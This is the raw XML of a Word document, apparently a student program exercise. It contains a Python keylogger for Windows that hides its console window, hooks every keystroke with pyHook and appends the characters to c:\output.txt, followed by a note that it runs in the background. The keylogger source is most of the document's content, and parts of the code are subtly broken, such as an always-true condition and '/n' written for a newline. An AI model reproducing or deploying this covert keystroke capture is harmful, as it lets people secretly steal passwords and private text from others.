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3D2AA" w14:textId="77777777" w:rsidR="003675CD" w:rsidRPr="003675CD" w:rsidRDefault="003675CD" w:rsidP="003675CD">
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve"># Python code for keylogger </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D1075D" w14:textId="67E087D7" w:rsidR="003675CD" w:rsidRPr="003675CD" w:rsidRDefault="003675CD" w:rsidP="003675CD">
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve"># to be used in windows </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5AF4A3" w14:textId="2BC840E9" w:rsidR="003675CD" w:rsidRPr="003675CD" w:rsidRDefault="003675CD" w:rsidP="003675CD">
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve">import win32api </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3829AD4F" w14:textId="3C6F0383" w:rsidR="003675CD" w:rsidRPr="003675CD" w:rsidRDefault="003675CD" w:rsidP="003675CD">
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve">import win32console </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F6AF7C" w14:textId="09E67C67" w:rsidR="003675CD" w:rsidRPr="003675CD" w:rsidRDefault="003675CD" w:rsidP="003675CD">
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve">import win32gui </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027862A4" w14:textId="2AAD7659" w:rsidR="003675CD" w:rsidRPr="003675CD" w:rsidRDefault="003675CD" w:rsidP="003675CD">
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve">import pythoncom, pyHook </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6A231A" w14:textId="5BA20793" w:rsidR="003675CD" w:rsidRPr="003675CD" w:rsidRDefault="003675CD" w:rsidP="003675CD">
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve">win = win32console.GetConsoleWindow() </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D85078" w14:textId="72098B09" w:rsidR="003675CD" w:rsidRPr="003675CD" w:rsidRDefault="003675CD" w:rsidP="003675CD">
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve">win32gui.ShowWindow(win, 0) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4EEA29" w14:textId="77777777" w:rsidR="003675CD" w:rsidRDefault="003675CD" w:rsidP="003675CD">
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve">def OnKeyboardEvent(event): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3402797A" w14:textId="4A24458F" w:rsidR="003675CD" w:rsidRDefault="003675CD" w:rsidP="003675CD">
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve">  if event.Ascii==5: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8F9E83" w14:textId="77777777" w:rsidR="003675CD" w:rsidRDefault="003675CD" w:rsidP="003675CD">
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve"> exit(1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C907567" w14:textId="3B372B94" w:rsidR="003675CD" w:rsidRPr="003675CD" w:rsidRDefault="003675CD" w:rsidP="003675CD">
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve">  if event.Ascii !=0 or 8: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A7272B" w14:textId="190C2A5B" w:rsidR="003675CD" w:rsidRPr="003675CD" w:rsidRDefault="003675CD" w:rsidP="003675CD">
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve">  #open output.txt to read current keystrokes </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2599268F" w14:textId="02C196BD" w:rsidR="003675CD" w:rsidRPr="003675CD" w:rsidRDefault="003675CD" w:rsidP="003675CD">
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve">  f = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003675CD">
        <w:t>open(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve">'c:\output.txt', 'r+') </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1C566E" w14:textId="77777777" w:rsidR="007A5BEF" w:rsidRDefault="003675CD" w:rsidP="003675CD">
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve">  buffer = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003675CD">
        <w:t>f.read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:r w:rsidR="007A5BEF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081BD3DE" w14:textId="31A5A79F" w:rsidR="003675CD" w:rsidRPr="003675CD" w:rsidRDefault="003675CD" w:rsidP="003675CD">
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003675CD">
        <w:t>f.close</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve">() </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E97827" w14:textId="4B6BD0F5" w:rsidR="003675CD" w:rsidRPr="003675CD" w:rsidRDefault="003675CD" w:rsidP="003675CD">
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve">  # open output.txt to write current + new keystrokes </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F907B2" w14:textId="77777777" w:rsidR="007A5BEF" w:rsidRDefault="003675CD" w:rsidP="003675CD">
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve">  f = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003675CD">
        <w:t>open(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve">'c:\output.txt', 'w') </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4571E490" w14:textId="482F178D" w:rsidR="003675CD" w:rsidRDefault="003675CD" w:rsidP="003675CD">
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003675CD">
        <w:t>keylogs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve"> = chr(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003675CD">
        <w:t>event.Ascii</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2964D0" w14:textId="6AD9FF96" w:rsidR="003675CD" w:rsidRPr="003675CD" w:rsidRDefault="003675CD" w:rsidP="003675CD">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003675CD">
        <w:t>event.Ascii</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve"> == 13: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3325D659" w14:textId="2A4F2275" w:rsidR="003675CD" w:rsidRPr="003675CD" w:rsidRDefault="003675CD" w:rsidP="003675CD">
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve"> keylogs = '/n'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5AF530" w14:textId="38E9B5C0" w:rsidR="007A5BEF" w:rsidRDefault="003675CD" w:rsidP="003675CD">
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve"> buffer += </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003675CD">
        <w:t>keylogs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007A5BEF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518B1EB0" w14:textId="78EE5905" w:rsidR="003675CD" w:rsidRDefault="003675CD" w:rsidP="003675CD">
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003675CD">
        <w:t>f.write</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003675CD">
        <w:t>(buffer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1DF2FF" w14:textId="4F01913B" w:rsidR="003675CD" w:rsidRPr="003675CD" w:rsidRDefault="003675CD" w:rsidP="003675CD">
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003675CD">
        <w:t>f.close</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve">() </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFFF202" w14:textId="77777777" w:rsidR="003675CD" w:rsidRPr="003675CD" w:rsidRDefault="003675CD" w:rsidP="003675CD">
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve"># create a hook manager object </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AD8B18" w14:textId="77777777" w:rsidR="003675CD" w:rsidRPr="003675CD" w:rsidRDefault="003675CD" w:rsidP="003675CD">
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve">hm = pyHook.HookManager() </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699E3B7E" w14:textId="77777777" w:rsidR="003675CD" w:rsidRPr="003675CD" w:rsidRDefault="003675CD" w:rsidP="003675CD">
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve">hm.KeyDown = OnKeyboardEvent </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765D37B9" w14:textId="77777777" w:rsidR="003675CD" w:rsidRPr="003675CD" w:rsidRDefault="003675CD" w:rsidP="003675CD">
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve"># set the hook </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712FA413" w14:textId="77777777" w:rsidR="003675CD" w:rsidRPr="003675CD" w:rsidRDefault="003675CD" w:rsidP="003675CD">
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve">hm.HookKeyboard() </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB64E15" w14:textId="77777777" w:rsidR="003675CD" w:rsidRPr="003675CD" w:rsidRDefault="003675CD" w:rsidP="003675CD">
      <w:r w:rsidRPr="003675CD">
        <w:t xml:space="preserve"># wait forever </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6376D3F5" w14:textId="5A39442E" w:rsidR="003675CD" w:rsidRPr="003675CD" w:rsidRDefault="003675CD" w:rsidP="003675CD">
      <w:r w:rsidRPr="003675CD">
        <w:t>pythoncom.PumpMessages()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAA2960" w14:textId="77777777" w:rsidR="007A5BEF" w:rsidRDefault="007A5BEF" w:rsidP="007A5BEF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Output: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F96F1A" w14:textId="1E024216" w:rsidR="003675CD" w:rsidRDefault="007A5BEF" w:rsidP="007A5BEF">
      <w:r>
        <w:t>The keylogger will be started in the background and save all the data on the log file “c:\output.txt”.</w:t>
      </w:r>
      <w:r w:rsidR="003675CD" w:rsidRPr="003675CD">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="20182B13" w14:textId="100B3708" w:rsidR="003675CD" w:rsidRDefault="003675CD" w:rsidP="003675CD"/>
    <w:p w14:paraId="194ADBD7" w14:textId="77777777" w:rsidR="003675CD" w:rsidRDefault="003675CD">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CD8F9C" w14:textId="77777777" w:rsidR="003675CD" w:rsidRDefault="003675CD" w:rsidP="003675CD"/>
    <w:sectPr w:rsidR="003675C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8DA30" w14:textId="77777777" w:rsidR="009063B4" w:rsidRDefault="009063B4" w:rsidP="00CA4B36">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0749FC9F" w14:textId="77777777" w:rsidR="009063B4" w:rsidRDefault="009063B4" w:rsidP="00CA4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9B987" w14:textId="77777777" w:rsidR="00CA4B36" w:rsidRDefault="00CA4B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F6134" w14:textId="77777777" w:rsidR="00CA4B36" w:rsidRDefault="00CA4B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DD9F5" w14:textId="77777777" w:rsidR="00CA4B36" w:rsidRDefault="00CA4B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90D75" w14:textId="77777777" w:rsidR="009063B4" w:rsidRDefault="009063B4" w:rsidP="00CA4B36">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0014171C" w14:textId="77777777" w:rsidR="009063B4" w:rsidRDefault="009063B4" w:rsidP="00CA4B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AF442" w14:textId="77777777" w:rsidR="00CA4B36" w:rsidRDefault="00CA4B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5218F" w14:textId="77777777" w:rsidR="00CA4B36" w:rsidRDefault="00CA4B36">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:lang w:val="en-GB"/>
      </w:rPr>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="4B585392" w14:textId="2D0B38C8" w:rsidR="00CA4B36" w:rsidRPr="00CA4B36" w:rsidRDefault="00CA4B36">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:lang w:val="en-GB"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:lang w:val="en-GB"/>
      </w:rPr>
      <w:t>Program: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B2C2F" w14:textId="77777777" w:rsidR="00CA4B36" w:rsidRDefault="00CA4B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5CD"/>
    <w:rsid w:val="00096083"/>
    <w:rsid w:val="003675CD"/>
    <w:rsid w:val="007A5BEF"/>
    <w:rsid w:val="009063B4"/>
    <w:rsid w:val="00CA4B36"/>
    <w:rsid w:val="00D17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9E6AC"/>
  <w15:docId w15:val="{0AC73FFE-3CDE-4596-B3EE-7693A6B83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4B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B36"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CA4B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B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p</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>dinesh p</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-16T04:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-16T04:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>